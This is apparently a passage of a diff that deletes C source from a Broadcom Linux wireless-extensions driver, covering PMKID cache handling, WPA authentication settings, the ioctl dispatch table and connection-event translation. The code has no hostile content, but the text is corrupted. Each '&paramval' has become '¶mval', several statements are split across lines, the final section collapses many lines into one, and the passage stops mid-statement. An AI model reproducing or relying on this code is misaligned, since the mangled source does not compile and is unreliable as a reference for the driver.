-- pmkid_list_t pmkid, *pmkidptr;
-- pmkidptr = &pmkid;
-- bcopy(&iwpmksa->bssid.sa_data[0], &pmkidptr->pmkid[0].BSSID, ETHER_ADDR_LEN);
-- bcopy(&iwpmksa->pmkid[0], &pmkidptr->pmkid[0].PMKID, WPA2_PMKID_LEN);
-- {
-- uint j;
-- WL_TRACE(("wl_iw_set_pmksa,IW_PMKSA_REMOVE - PMKID: %s = ",
-- bcm_ether_ntoa(&pmkidptr->pmkid[0].BSSID,
-- eabuf)));
-- for (j = 0; j < WPA2_PMKID_LEN; j++)
-- WL_TRACE(("%02x ", pmkidptr->pmkid[0].PMKID[j]));
-- WL_TRACE(("\n"));
-- }
-- for (i = 0; i < pmkid_list.pmkids.npmkid; i++)
-- if (!bcmp(&iwpmksa->bssid.sa_data[0], &pmkid_array[i].BSSID,
-- ETHER_ADDR_LEN))
-- break;
-- for (; i < pmkid_list.pmkids.npmkid; i++) {
-- bcopy(&pmkid_array[i+1].BSSID,
--
&pmkid_array[i].BSSID,
-- ETHER_ADDR_LEN);
-- bcopy(&pmkid_array[i+1].PMKID,
-- &pmkid_array[i].PMKID,
-- WPA2_PMKID_LEN);
-- }
-- pmkid_list.pmkids.npmkid--;
-- }
-- if (iwpmksa->cmd == IW_PMKSA_ADD) {
-- bcopy(&iwpmksa->bssid.sa_data[0],
-- &pmkid_array[pmkid_list.pmkids.npmkid].BSSID,
-- ETHER_ADDR_LEN);
-- bcopy(&iwpmksa->pmkid[0], &pmkid_array[pmkid_list.pmkids.npmkid].PMKID,
-- WPA2_PMKID_LEN);
-- {
-- uint j;
-- uint k;
-- k = pmkid_list.pmkids.npmkid;
-- BCM_REFERENCE(k);
-- WL_TRACE(("wl_iw_set_pmksa,IW_PMKSA_ADD - PMKID: %s = ",
-- bcm_ether_ntoa(&pmkid_array[k].BSSID,
-- eabuf)));
-- for (j = 0; j < WPA2_PMKID_LEN; j++)
-- WL_TRACE(("%02x ", pmkid_array[k].PMKID[j]));
-- WL_TRACE(("\n"));
-- }
-- pmkid_list.pmkids.npmkid++;
-- }
-- WL_TRACE(("PRINTING pmkid LIST - No of elements %d\n", pmkid_list.pmkids.npmkid));
-- for (i = 0; i < pmkid_list.pmkids.npmkid; i++) {
-- uint j;
-- WL_TRACE(("PMKID[%d]: %s = ", i,
-- bcm_ether_ntoa(&pmkid_array[i].BSSID,
-- eabuf)));
-- for (j = 0; j < WPA2_PMKID_LEN; j++)
-- WL_TRACE(("%02x ", pmkid_array[i].PMKID[j]));
-- printf("\n");
-- }
-- WL_TRACE(("\n"));
-- dev_wlc_bufvar_set(dev, "pmkid_info", (char *)&pmkid_list, sizeof(pmkid_list));
-- return 0;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static int
--wl_iw_get_encodeext(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- WL_TRACE(("%s: SIOCGIWENCODEEXT\n", dev->name));
-- return 0;
--}
--
--static int
--wl_iw_set_wpaauth(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error = 0;
-- int paramid;
-- int paramval;
-- uint32 cipher_combined;
-- int val = 0;
-- wl_iw_t *iw = IW_DEV_IF(dev);
--
-- WL_TRACE(("%s: SIOCSIWAUTH\n", dev->name));
--
-- paramid = vwrq->flags & IW_AUTH_INDEX;
-- paramval = vwrq->value;
--
-- WL_TRACE(("%s: SIOCSIWAUTH, paramid = 0x%0x, paramval = 0x%0x\n",
-- dev->name, paramid, paramval));
--
-- switch (paramid) {
--
-- case IW_AUTH_WPA_VERSION:
-- /* supported wpa version disabled or wpa or wpa2 */
-- if (paramval & IW_AUTH_WPA_VERSION_DISABLED)
-- val = WPA_AUTH_DISABLED;
-- else if (paramval & (IW_AUTH_WPA_VERSION_WPA))
-- val = WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED;
-- else if (paramval & IW_AUTH_WPA_VERSION_WPA2)
-- val = WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED;
-- WL_TRACE(("%s: %d: setting wpa_auth to 0x%0x\n", __FUNCTION__, __LINE__, val));
-- if ((error = dev_wlc_intvar_set(dev, "wpa_auth", val)))
-- return error;
-- break;
--
-- case IW_AUTH_CIPHER_PAIRWISE:
-- case IW_AUTH_CIPHER_GROUP: {
-- int fbt_cap = 0;
--
-- if (paramid == IW_AUTH_CIPHER_PAIRWISE) {
-- iw->pwsec = paramval;
-- }
-- else {
-- iw->gwsec = paramval;
-- }
--
-- if ((error = dev_wlc_intvar_get(dev, "wsec", &val)))
-- return error;
--
-- cipher_combined = iw->gwsec | iw->pwsec;
-- val &= ~(WEP_ENABLED | TKIP_ENABLED | AES_ENABLED);
-- if (cipher_combined & (IW_AUTH_CIPHER_WEP40 | IW_AUTH_CIPHER_WEP104))
-- val |= WEP_ENABLED;
-- if (cipher_combined & IW_AUTH_CIPHER_TKIP)
-- val |= TKIP_ENABLED;
-- if (cipher_combined & IW_AUTH_CIPHER_CCMP)
-- val |= AES_ENABLED;
--
-- if (iw->privacy_invoked && !val) {
-- WL_WSEC(("%s: %s: 'Privacy invoked' TRUE but clearing wsec, assuming "
-- "we're a WPS enrollee\n", dev->name, __FUNCTION__));
-- if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", TRUE))) {
-- WL_WSEC(("Failed to set iovar is_WPS_enrollee\n"));
-- return error;
-- }
-- } else if (val) {
-- if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
-- WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
-- return error;
-- }
-- }
--
-- if ((error = dev_wlc_intvar_set(dev, "wsec", val)))
-- return error;
--
-- /* Ensure in-dongle supplicant is turned on when FBT wants to do the 4-way
-- * handshake.
-- */
-- if (dev_wlc_intvar_get(dev, "fbt_cap", &fbt_cap) == 0) {
-- if (fbt_cap == WLC_FBT_CAP_DRV_4WAY_AND_REASSOC) {
-- if ((paramid == IW_AUTH_CIPHER_PAIRWISE) && (val & AES_ENABLED)) {
-- if ((error = dev_wlc_intvar_set(dev, "sup_wpa", 1)))
-- return error;
-- }
-- else if (val == 0) {
-- if ((error = dev_wlc_intvar_set(dev, "sup_wpa", 0)))
-- return error;
-- }
-- }
-- }
-- break;
-- }
--
-- case IW_AUTH_KEY_MGMT:
-- if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
-- return error;
--
-- if (val & (WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED)) {
-- if (paramval & (IW_AUTH_KEY_MGMT_FT_PSK | IW_AUTH_KEY_MGMT_PSK))
-- val = WPA_AUTH_PSK;
-- else
-- val = WPA_AUTH_UNSPECIFIED;
-- if (paramval & (IW_AUTH_KEY_MGMT_FT_802_1X | IW_AUTH_KEY_MGMT_FT_PSK))
-- val |= WPA2_AUTH_FT;
-- }
-- else if (val & (WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED)) {
-- if (paramval & (IW_AUTH_KEY_MGMT_FT_PSK | IW_AUTH_KEY_MGMT_PSK))
-- val = WPA2_AUTH_PSK;
-- else
-- val = WPA2_AUTH_UNSPECIFIED;
-- if (paramval & (IW_AUTH_KEY_MGMT_FT_802_1X | IW_AUTH_KEY_MGMT_FT_PSK))
-- val |= WPA2_AUTH_FT;
-- }
-- WL_TRACE(("%s: %d: setting wpa_auth to %d\n", __FUNCTION__, __LINE__, val));
-- if ((error = dev_wlc_intvar_set(dev, "wpa_auth", val)))
-- return error;
-- break;
--
-- case IW_AUTH_TKIP_COUNTERMEASURES:
-- dev_wlc_bufvar_set(dev, "tkip_countermeasures", (char *)¶mval, 1);
-- break;
--
-- case IW_AUTH_80211_AUTH_ALG:
-- /* open shared */
-- WL_ERROR(("Setting the D11auth %d\n", paramval));
-- if (paramval & IW_AUTH_ALG_OPEN_SYSTEM)
-- val = 0;
-- else if (paramval & IW_AUTH_ALG_SHARED_KEY)
-- val = 1;
-- else
-- error = 1;
-- if (!error && (error = dev_wlc_intvar_set(dev, "auth", val)))
-- return error;
-- break;
--
-- case IW_AUTH_WPA_ENABLED:
-- if (paramval == 0) {
-- val = 0;
-- WL_TRACE(("%s: %d: setting wpa_auth to %d\n", __FUNCTION__, __LINE__, val));
-- error = dev_wlc_intvar_set(dev, "wpa_auth", val);
-- return error;
-- }
-- else {
-- /* If WPA is enabled, wpa_auth is set elsewhere */
-- }
-- break;
--
-- case IW_AUTH_DROP_UNENCRYPTED:
-- dev_wlc_bufvar_set(dev, "wsec_restrict", (char *)¶mval, 1);
-- break;
--
-- case IW_AUTH_RX_UNENCRYPTED_EAPOL:
-- dev_wlc_bufvar_set(dev, "rx_unencrypted_eapol", (char *)¶mval, 1);
-- break;
--
--#if WIRELESS_EXT > 17
--
-- case IW_AUTH_ROAMING_CONTROL:
-- WL_TRACE(("%s: IW_AUTH_ROAMING_CONTROL\n", __FUNCTION__));
-- /* driver control or user space app control */
-- break;
--
-- case IW_AUTH_PRIVACY_INVOKED: {
-- int wsec;
--
-- if (paramval == 0) {
-- iw->privacy_invoked = FALSE;
-- if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
-- WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
-- return error;
-- }
-- } else {
-- iw->privacy_invoked = TRUE;
-- if ((error = dev_wlc_intvar_get(dev, "wsec", &wsec)))
-- return error;
--
-- if (!WSEC_ENABLED(wsec)) {
-- /* if privacy is true, but wsec is false, we are a WPS enrollee */
-- if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", TRUE))) {
-- WL_WSEC(("Failed to set iovar is_WPS_enrollee\n"));
-- return error;
-- }
-- } else {
-- if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
-- WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
-- return error;
-- }
-- }
-- }
-- break;
-- }
--
--
--#endif /* WIRELESS_EXT > 17 */
--
--
-- default:
-- break;
-- }
-- return 0;
--}
--#define VAL_PSK(_val) (((_val) & WPA_AUTH_PSK) || ((_val) & WPA2_AUTH_PSK))
--
--static int
--wl_iw_get_wpaauth(
-- struct net_device *dev,
-- struct iw_request_info *info,
-- struct iw_param *vwrq,
-- char *extra
--)
--{
-- int error;
-- int paramid;
-- int paramval = 0;
-- int val;
-- wl_iw_t *iw = IW_DEV_IF(dev);
--
-- WL_TRACE(("%s: SIOCGIWAUTH\n", dev->name));
--
-- paramid = vwrq->flags & IW_AUTH_INDEX;
--
-- switch (paramid) {
-- case IW_AUTH_WPA_VERSION:
-- /* supported wpa version disabled or wpa or wpa2 */
-- if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
-- return error;
-- if (val & (WPA_AUTH_NONE | WPA_AUTH_DISABLED))
-- paramval =
IW_AUTH_WPA_VERSION_DISABLED;
-- else if (val & (WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED))
-- paramval = IW_AUTH_WPA_VERSION_WPA;
-- else if (val & (WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED))
-- paramval = IW_AUTH_WPA_VERSION_WPA2;
-- break;
--
-- case IW_AUTH_CIPHER_PAIRWISE:
-- paramval = iw->pwsec;
-- break;
--
-- case IW_AUTH_CIPHER_GROUP:
-- paramval = iw->gwsec;
-- break;
--
-- case IW_AUTH_KEY_MGMT:
-- /* psk, 1x */
-- if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
-- return error;
-- if (VAL_PSK(val))
-- paramval = IW_AUTH_KEY_MGMT_PSK;
-- else
-- paramval = IW_AUTH_KEY_MGMT_802_1X;
--
-- break;
-- case IW_AUTH_TKIP_COUNTERMEASURES:
-- dev_wlc_bufvar_get(dev, "tkip_countermeasures", (char *)¶mval, 1);
-- break;
--
-- case IW_AUTH_DROP_UNENCRYPTED:
-- dev_wlc_bufvar_get(dev, "wsec_restrict", (char *)¶mval, 1);
-- break;
--
-- case IW_AUTH_RX_UNENCRYPTED_EAPOL:
-- dev_wlc_bufvar_get(dev, "rx_unencrypted_eapol", (char *)¶mval, 1);
-- break;
--
-- case IW_AUTH_80211_AUTH_ALG:
-- /* open, shared, leap */
-- if ((error = dev_wlc_intvar_get(dev, "auth", &val)))
-- return error;
-- if (!val)
-- paramval = IW_AUTH_ALG_OPEN_SYSTEM;
-- else
-- paramval = IW_AUTH_ALG_SHARED_KEY;
-- break;
-- case IW_AUTH_WPA_ENABLED:
-- if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
-- return error;
-- if (val)
-- paramval = TRUE;
-- else
-- paramval = FALSE;
-- break;
--
--#if WIRELESS_EXT > 17
--
-- case IW_AUTH_ROAMING_CONTROL:
-- WL_ERROR(("%s: IW_AUTH_ROAMING_CONTROL\n", __FUNCTION__));
-- /* driver control or user space app control */
-- break;
--
-- case IW_AUTH_PRIVACY_INVOKED:
-- paramval = iw->privacy_invoked;
-- break;
--
--#endif /* WIRELESS_EXT > 17 */
-- }
-- vwrq->value = paramval;
-- return 0;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static const iw_handler wl_iw_handler[] =
--{
-- (iw_handler) wl_iw_config_commit, /* SIOCSIWCOMMIT */
-- (iw_handler) wl_iw_get_name, /* SIOCGIWNAME */
-- (iw_handler) NULL, /* SIOCSIWNWID */
-- (iw_handler) NULL, /*
SIOCGIWNWID */
-- (iw_handler) wl_iw_set_freq, /* SIOCSIWFREQ */
-- (iw_handler) wl_iw_get_freq, /* SIOCGIWFREQ */
-- (iw_handler) wl_iw_set_mode, /* SIOCSIWMODE */
-- (iw_handler) wl_iw_get_mode, /* SIOCGIWMODE */
-- (iw_handler) NULL, /* SIOCSIWSENS */
-- (iw_handler) NULL, /* SIOCGIWSENS */
-- (iw_handler) NULL, /* SIOCSIWRANGE */
-- (iw_handler) wl_iw_get_range, /* SIOCGIWRANGE */
-- (iw_handler) NULL, /* SIOCSIWPRIV */
-- (iw_handler) NULL, /* SIOCGIWPRIV */
-- (iw_handler) NULL, /* SIOCSIWSTATS */
-- (iw_handler) NULL, /* SIOCGIWSTATS */
-- (iw_handler) wl_iw_set_spy, /* SIOCSIWSPY */
-- (iw_handler) wl_iw_get_spy, /* SIOCGIWSPY */
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) wl_iw_set_wap, /* SIOCSIWAP */
-- (iw_handler) wl_iw_get_wap, /* SIOCGIWAP */
--#if WIRELESS_EXT > 17
-- (iw_handler) wl_iw_mlme, /* SIOCSIWMLME */
--#else
-- (iw_handler) NULL, /* -- hole -- */
--#endif
-- (iw_handler) wl_iw_iscan_get_aplist, /* SIOCGIWAPLIST */
--#if WIRELESS_EXT > 13
-- (iw_handler) wl_iw_iscan_set_scan, /* SIOCSIWSCAN */
-- (iw_handler) wl_iw_iscan_get_scan, /* SIOCGIWSCAN */
--#else /* WIRELESS_EXT > 13 */
-- (iw_handler) NULL, /* SIOCSIWSCAN */
-- (iw_handler) NULL, /* SIOCGIWSCAN */
--#endif /* WIRELESS_EXT > 13 */
-- (iw_handler) wl_iw_set_essid, /* SIOCSIWESSID */
-- (iw_handler) wl_iw_get_essid, /* SIOCGIWESSID */
-- (iw_handler) wl_iw_set_nick, /* SIOCSIWNICKN */
-- (iw_handler) wl_iw_get_nick, /* SIOCGIWNICKN */
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) wl_iw_set_rate, /* SIOCSIWRATE */
-- (iw_handler) wl_iw_get_rate, /* SIOCGIWRATE */
-- (iw_handler) wl_iw_set_rts, /* SIOCSIWRTS */
-- (iw_handler) wl_iw_get_rts, /* SIOCGIWRTS */
-- (iw_handler) wl_iw_set_frag, /* SIOCSIWFRAG */
-- (iw_handler) wl_iw_get_frag, /* SIOCGIWFRAG */
-- (iw_handler) wl_iw_set_txpow, /* SIOCSIWTXPOW */
-- (iw_handler) wl_iw_get_txpow, /* SIOCGIWTXPOW */
--#if WIRELESS_EXT > 10
--
(iw_handler) wl_iw_set_retry, /* SIOCSIWRETRY */
-- (iw_handler) wl_iw_get_retry, /* SIOCGIWRETRY */
--#endif /* WIRELESS_EXT > 10 */
-- (iw_handler) wl_iw_set_encode, /* SIOCSIWENCODE */
-- (iw_handler) wl_iw_get_encode, /* SIOCGIWENCODE */
-- (iw_handler) wl_iw_set_power, /* SIOCSIWPOWER */
-- (iw_handler) wl_iw_get_power, /* SIOCGIWPOWER */
--#if WIRELESS_EXT > 17
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) NULL, /* -- hole -- */
-- (iw_handler) wl_iw_set_wpaie, /* SIOCSIWGENIE */
-- (iw_handler) wl_iw_get_wpaie, /* SIOCGIWGENIE */
-- (iw_handler) wl_iw_set_wpaauth, /* SIOCSIWAUTH */
-- (iw_handler) wl_iw_get_wpaauth, /* SIOCGIWAUTH */
-- (iw_handler) wl_iw_set_encodeext, /* SIOCSIWENCODEEXT */
-- (iw_handler) wl_iw_get_encodeext, /* SIOCGIWENCODEEXT */
-- (iw_handler) wl_iw_set_pmksa, /* SIOCSIWPMKSA */
--#endif /* WIRELESS_EXT > 17 */
--};
--
--#if WIRELESS_EXT > 12
--enum {
-- WL_IW_SET_LEDDC = SIOCIWFIRSTPRIV,
-- WL_IW_SET_VLANMODE,
-- WL_IW_SET_PM,
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
-- WL_IW_SET_LAST
--};
--
--static iw_handler wl_iw_priv_handler[] = {
-- wl_iw_set_leddc,
-- wl_iw_set_vlanmode,
-- wl_iw_set_pm,
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
-- NULL
--};
--
--static struct iw_priv_args wl_iw_priv_args[] = {
-- {
-- WL_IW_SET_LEDDC,
-- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
-- 0,
-- "set_leddc"
-- },
-- {
-- WL_IW_SET_VLANMODE,
-- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
-- 0,
-- "set_vlanmode"
-- },
-- {
-- WL_IW_SET_PM,
-- IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
-- 0,
-- "set_pm"
-- },
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
-- { 0, 0, 0, { 0 } }
--};
--
--const struct iw_handler_def wl_iw_handler_def =
--{
-- .num_standard = ARRAYSIZE(wl_iw_handler),
-- .num_private = ARRAY_SIZE(wl_iw_priv_handler),
-- .num_private_args = ARRAY_SIZE(wl_iw_priv_args),
-- .standard = (iw_handler *) wl_iw_handler,
-- .private = wl_iw_priv_handler,
-- .private_args = wl_iw_priv_args,
--#if
WIRELESS_EXT >= 19
-- get_wireless_stats: dhd_get_wireless_stats,
--#endif /* WIRELESS_EXT >= 19 */
-- };
--#endif /* WIRELESS_EXT > 12 */
--
--int
--wl_iw_ioctl(
-- struct net_device *dev,
-- struct ifreq *rq,
-- int cmd
--)
--{
-- struct iwreq *wrq = (struct iwreq *) rq;
-- struct iw_request_info info;
-- iw_handler handler;
-- char *extra = NULL;
-- size_t token_size = 1;
-- int max_tokens = 0, ret = 0;
--
-- if (cmd < SIOCIWFIRST ||
-- IW_IOCTL_IDX(cmd) >= ARRAYSIZE(wl_iw_handler) ||
-- !(handler = wl_iw_handler[IW_IOCTL_IDX(cmd)]))
-- return -EOPNOTSUPP;
--
-- switch (cmd) {
--
-- case SIOCSIWESSID:
-- case SIOCGIWESSID:
-- case SIOCSIWNICKN:
-- case SIOCGIWNICKN:
-- max_tokens = IW_ESSID_MAX_SIZE + 1;
-- break;
--
-- case SIOCSIWENCODE:
-- case SIOCGIWENCODE:
--#if WIRELESS_EXT > 17
-- case SIOCSIWENCODEEXT:
-- case SIOCGIWENCODEEXT:
--#endif
-- max_tokens = IW_ENCODING_TOKEN_MAX;
-- break;
--
-- case SIOCGIWRANGE:
-- max_tokens = sizeof(struct iw_range);
-- break;
--
-- case SIOCGIWAPLIST:
-- token_size = sizeof(struct sockaddr) + sizeof(struct iw_quality);
-- max_tokens = IW_MAX_AP;
-- break;
--
--#if WIRELESS_EXT > 13
-- case SIOCGIWSCAN:
-- if (g_iscan)
-- max_tokens = wrq->u.data.length;
-- else
-- max_tokens = IW_SCAN_MAX_DATA;
-- break;
--#endif /* WIRELESS_EXT > 13 */
--
-- case SIOCSIWSPY:
-- token_size = sizeof(struct sockaddr);
-- max_tokens = IW_MAX_SPY;
-- break;
--
-- case SIOCGIWSPY:
-- token_size = sizeof(struct sockaddr) + sizeof(struct iw_quality);
-- max_tokens = IW_MAX_SPY;
-- break;
-- default:
-- break;
-- }
--
-- if (max_tokens && wrq->u.data.pointer) {
-- if (wrq->u.data.length > max_tokens)
-- return -E2BIG;
--
-- if (!(extra = kmalloc(max_tokens * token_size, GFP_KERNEL)))
-- return -ENOMEM;
--
-- if (copy_from_user(extra, wrq->u.data.pointer, wrq->u.data.length * token_size)) {
-- kfree(extra);
-- return -EFAULT;
-- }
-- }
--
-- info.cmd = cmd;
-- info.flags = 0;
--
-- ret = handler(dev, &info, &wrq->u, extra);
--
-- if (extra) {
--
if (copy_to_user(wrq->u.data.pointer, extra, wrq->u.data.length * token_size)) {
-- kfree(extra);
-- return -EFAULT;
-- }
--
-- kfree(extra);
-- }
--
-- return ret;
--}
--
--/* Convert a connection status event into a connection status string.
-- * Returns TRUE if a matching connection status string was found.
-- */
--bool
--wl_iw_conn_status_str(uint32 event_type, uint32 status, uint32 reason,
-- char* stringBuf, uint buflen)
--{
-- typedef struct conn_fail_event_map_t {
-- uint32 inEvent; /* input: event type to match */
-- uint32 inStatus; /* input: event status code to match */
-- uint32 inReason; /* input: event reason code to match */
-- const char* outName; /* output: failure type */
-- const char* outCause; /* output: failure cause */
-- } conn_fail_event_map_t;
--
-- /* Map of WLC_E events to connection failure strings */
--# define WL_IW_DONT_CARE 9999
-- const conn_fail_event_map_t event_map [] = {
-- /* inEvent inStatus inReason */
-- /* outName outCause */
-- {WLC_E_SET_SSID, WLC_E_STATUS_SUCCESS, WL_IW_DONT_CARE,
-- "Conn", "Success"},
-- {WLC_E_SET_SSID, WLC_E_STATUS_NO_NETWORKS, WL_IW_DONT_CARE,
-- "Conn", "NoNetworks"},
-- {WLC_E_SET_SSID, WLC_E_STATUS_FAIL, WL_IW_DONT_CARE,
-- "Conn", "ConfigMismatch"},
-- {WLC_E_PRUNE, WL_IW_DONT_CARE, WLC_E_PRUNE_ENCR_MISMATCH,
-- "Conn", "EncrypMismatch"},
-- {WLC_E_PRUNE, WL_IW_DONT_CARE, WLC_E_RSN_MISMATCH,
-- "Conn", "RsnMismatch"},
-- {WLC_E_AUTH, WLC_E_STATUS_TIMEOUT, WL_IW_DONT_CARE,
-- "Conn", "AuthTimeout"},
-- {WLC_E_AUTH, WLC_E_STATUS_FAIL, WL_IW_DONT_CARE,
-- "Conn", "AuthFail"},
-- {WLC_E_AUTH, WLC_E_STATUS_NO_ACK, WL_IW_DONT_CARE,
-- "Conn", "AuthNoAck"},
-- {WLC_E_REASSOC, WLC_E_STATUS_FAIL, WL_IW_DONT_CARE,
-- "Conn", "ReassocFail"},
-- {WLC_E_REASSOC, WLC_E_STATUS_TIMEOUT, WL_IW_DONT_CARE,
-- "Conn", "ReassocTimeout"},
-- {WLC_E_REASSOC, WLC_E_STATUS_ABORT, WL_IW_DONT_CARE,
-- "Conn", "ReassocAbort"},
-- {WLC_E_PSK_SUP, WLC_SUP_KEYED, WL_IW_DONT_CARE,
-- "Sup", "ConnSuccess"},
-- {WLC_E_PSK_SUP,
WL_IW_DONT_CARE, WL_IW_DONT_CARE,
-- "Sup", "WpaHandshakeFail"},
-- {WLC_E_DEAUTH_IND, WL_IW_DONT_CARE, WL_IW_DONT_CARE,
-- "Conn", "Deauth"},
-- {WLC_E_DISASSOC_IND, WL_IW_DONT_CARE, WL_IW_DONT_CARE,
-- "Conn", "DisassocInd"},
-- {WLC_E_DISASSOC, WL_IW_DONT_CARE, WL_IW_DONT_CARE,
-- "Conn", "Disassoc"}
-- };
--
-- const char* name = "";
-- const char* cause = NULL;
-- int i;
--
-- /* Search the event map table for a matching event */
-- for (i = 0; i < sizeof(event_map)/sizeof(event_map[0]); i++) {
-- const conn_fail_event_map_t* row = &event_map[i];
-- if (row->inEvent == event_type &&
-- (row->inStatus == status || row->inStatus == WL_IW_DONT_CARE) &&
-- (row->inReason == reason || row->inReason == WL_IW_DONT_CARE)) {
-- name = row->outName;
-- cause = row->outCause;
-- break;
-- }
-- }
--
-- /* If found, generate a connection failure string and return TRUE */
-- if (cause) {
-- memset(stringBuf, 0, buflen);
-- snprintf(stringBuf, buflen, "%s %s %02d %02d",
-- name, cause, status, reason);
-- WL_TRACE(("Connection status: %s\n", stringBuf));
-- return TRUE;
-- } else {
-- return FALSE;
-- }
--}
--
--#if (WIRELESS_EXT > 14)
--/* Check if we have received an event that indicates connection failure
-- * If so, generate a connection failure report string.
-- * The caller supplies a buffer to hold the generated string.
-- */
--static bool
--wl_iw_check_conn_fail(wl_event_msg_t *e, char* stringBuf, uint buflen)
--{
-- uint32 event = ntoh32(e->event_type);
-- uint32 status = ntoh32(e->status);
-- uint32 reason = ntoh32(e->reason);
--
-- if (wl_iw_conn_status_str(event, status, reason, stringBuf, buflen)) {
-- return TRUE;
-- } else
-- {
-- return FALSE;
-- }
--}
--#endif /* WIRELESS_EXT > 14 */
--
--#ifndef IW_CUSTOM_MAX
--#define IW_CUSTOM_MAX 256 /* size of extra buffer used for translation of events */
--#endif /* IW_CUSTOM_MAX */
--
--void
--wl_iw_event(struct net_device *dev, wl_event_msg_t *e, void* data)
--{
--#if WIRELESS_EXT > 13
-- union iwreq_data wrqu;
-- char extra[IW_CUSTOM_MAX + 1];
-- int cmd = 0;
-- uint32 event_type = ntoh32(e->event_type);
-- uint16 flags = ntoh16(e->flags);
-- uint32 datalen = ntoh32(e->datalen);
-- uint32 status = ntoh32(e->status);
--
-- memset(&wrqu, 0, sizeof(wrqu));
-- memset(extra, 0, sizeof(extra));
--
-- memcpy(wrqu.addr.sa_data, &e->addr, ETHER_ADDR_LEN);
-- wrqu.addr.sa_family = ARPHRD_ETHER;
--
-- switch (event_type) {
-- case WLC_E_TXFAIL:
-- cmd = IWEVTXDROP;
-- break;
--#if WIRELESS_EXT > 14
-- case WLC_E_JOIN:
-- case WLC_E_ASSOC_IND:
-- case WLC_E_REASSOC_IND:
-- cmd = IWEVREGISTERED;
-- break;
-- case WLC_E_DEAUTH_IND:
-- case WLC_E_DISASSOC_IND:
-- cmd = SIOCGIWAP;
-- wrqu.data.length = strlen(extra);
-- bzero(wrqu.addr.sa_data, ETHER_ADDR_LEN);
-- bzero(&extra, ETHER_ADDR_LEN);
-- break;
--
-- case WLC_E_LINK:
-- case WLC_E_NDIS_LINK:
-- cmd = SIOCGIWAP;
-- wrqu.data.length = strlen(extra);
-- if (!(flags & WLC_EVENT_MSG_LINK)) {
-- bzero(wrqu.addr.sa_data, ETHER_ADDR_LEN);
-- bzero(&extra, ETHER_ADDR_LEN);
-- }
-- break;
-- case WLC_E_ACTION_FRAME:
-- cmd = IWEVCUSTOM;
-- if (datalen + 1 <= sizeof(extra)) {
-- wrqu.data.length = datalen + 1;
-- extra[0] = WLC_E_ACTION_FRAME;
-- memcpy(&extra[1], data, datalen);
-- WL_TRACE(("WLC_E_ACTION_FRAME len %d \n", wrqu.data.length));
-- }
-- break;
--
-- case
WLC_E_ACTION_FRAME_COMPLETE: -- cmd = IWEVCUSTOM; -- if (sizeof(status) + 1 <= sizeof(extra)) { -- wrqu.data.length = sizeof(status) + 1; -- extra[0] = WLC_E_ACTION_FRAME_COMPLETE; -- memcpy(&extra[1], &status, sizeof(status)); -- WL_TRACE(("wl_iw_event status %d \n", status)); -- } -- break; --#endif /* WIRELESS_EXT > 14 */ --#if WIRELESS_EXT > 17 -- case WLC_E_MIC_ERROR: { -- struct iw_michaelmicfailure *micerrevt = (struct iw_michaelmicfailure *)&extra; -- cmd = IWEVMICHAELMICFAILURE; -- wrqu.data.length = sizeof(struct iw_michaelmicfailure); -- if (flags & WLC_EVENT_MSG_GROUP) -- micerrevt->flags |= IW_MICFAILURE_GROUP; -- else -- micerrevt->flags |= IW_MICFAILURE_PAIRWISE; -- memcpy(micerrevt->src_addr.sa_data, &e->addr, ETHER_ADDR_LEN); -- micerrevt->src_addr.sa_family = ARPHRD_ETHER; -- -- break; -- } -- -- case WLC_E_ASSOC_REQ_IE: -- cmd = IWEVASSOCREQIE; -- wrqu.data.length = datalen; -- if (datalen < sizeof(extra)) -- memcpy(extra, data, datalen); -- break; -- -- case WLC_E_ASSOC_RESP_IE: -- cmd = IWEVASSOCRESPIE; -- wrqu.data.length = datalen; -- if (datalen < sizeof(extra)) -- memcpy(extra, data, datalen); -- break; -- -- case WLC_E_PMKID_CACHE: { -- struct iw_pmkid_cand *iwpmkidcand = (struct iw_pmkid_cand *)&extra; -- pmkid_cand_list_t *pmkcandlist; -- pmkid_cand_t *pmkidcand; -- int count; -- -- if (data == NULL) -- break; -- -- cmd = IWEVPMKIDCAND; -- pmkcandlist = data; -- count = ntoh32_ua((uint8 *)&pmkcandlist->npmkid_cand); -- wrqu.data.length = sizeof(struct iw_pmkid_cand); -- pmkidcand = pmkcandlist->pmkid_cand; -- while (count) { -- bzero(iwpmkidcand, sizeof(struct iw_pmkid_cand)); -- if (pmkidcand->preauth) -- iwpmkidcand->flags |= IW_PMKID_CAND_PREAUTH; -- bcopy(&pmkidcand->BSSID, &iwpmkidcand->bssid.sa_data, -- 